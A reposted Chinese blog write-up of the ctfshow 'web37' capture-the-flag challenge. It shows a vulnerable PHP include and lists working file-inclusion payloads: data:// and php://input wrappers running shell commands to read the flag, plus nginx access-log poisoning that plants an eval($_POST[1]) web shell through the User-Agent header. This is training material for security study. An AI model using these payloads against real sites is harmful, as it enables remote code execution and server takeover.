[ctfshow web入门] web37

2025/4/12 20:08:14 来源：https://blog.csdn.net/qq_50332504/article/details/147114854 浏览: 次关键词：[ctfshow web入门] web37

信息收集

题目有了变化，include$c

if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_match("/flag/i", $c)){include($c);echo $flag;}}else{highlight_file(__FILE__);
}

参考[ctfshow web入门] web31
同样是include，之前的方法还是有效的，只是过滤了flag。只需稍微修改即可

?c=data://text/plain,<?php system("ls") ?>
?c=data://text/plain,<?php system("tac fla*") ?>

或者

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCd0YWMgZmxhZy5waHAnKTsgPz4=

?c=php://input
post:
<?php system("ls") ?>
<?php system("tac flag.php") ?>

详情参考[ctfshow web入门] web31，步骤一样
重点：
http没有s
url?c=/var/log/nginx/access.log
user-agent的末尾添加<?php eval($_POST[1]) ?>此时1是密码，不要使用$_GET
步骤一样，不再演示

web36 目录 web38

本网仅为发布的内容提供存储空间，不对发表、转载的内容提供任何形式的保证。凡本网注明“来源：XXX网络”的作品，均转载自其它媒体，著作权归作者所有，商业转载请联系作者获得授权，非商业转载请注明出处。

我们尊重并感谢每一位作者，均已注明文章来源和作者。如因作品内容、版权或其它问题，请及时与我们联系，联系邮箱：809451989@qq.com，投稿邮箱：809451989@qq.com